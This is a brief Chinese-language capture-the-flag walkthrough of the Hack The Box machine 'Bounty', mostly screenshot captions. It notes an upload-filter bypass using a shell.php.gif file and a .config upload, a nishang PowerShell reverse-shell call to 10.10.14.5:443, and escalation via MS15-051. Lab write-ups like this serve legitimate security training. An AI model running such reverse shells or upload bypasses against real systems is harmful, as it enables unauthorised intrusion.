Hack the box靶机 Bounty

Hack the box靶机 Bounty_第1张图片Hack the box靶机 Bounty_第2张图片Hack the box靶机 Bounty_第3张图片

两个页面都是没有权限不能访问
但是也没有扫出来登录页面

Hack the box靶机 Bounty_第4张图片

投个图
他们换了本字典
我懒得扫了

Hack the box靶机 Bounty_第5张图片Hack the box靶机 Bounty_第6张图片

有过滤
上传了一个shell.php.gif绕过了
找到一篇博客
上传.config

Hack the box靶机 Bounty_第7张图片Hack the box靶机 Bounty_第8张图片Hack the box靶机 Bounty_第9张图片Hack the box靶机 Bounty_第10张图片
Hack the box靶机 Bounty_第11张图片

使用nishang的Invoke-PowerShellTcp.ps1的时候
需要在这个文件末尾加入调用
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
然后就可以连接了

Hack the box靶机 Bounty_第12张图片

没有补丁
那ms15-051

Hack the box靶机 Bounty_第13张图片
Hack the box靶机 Bounty_第14张图片

完成

你可能感兴趣的:(Hack,the,box)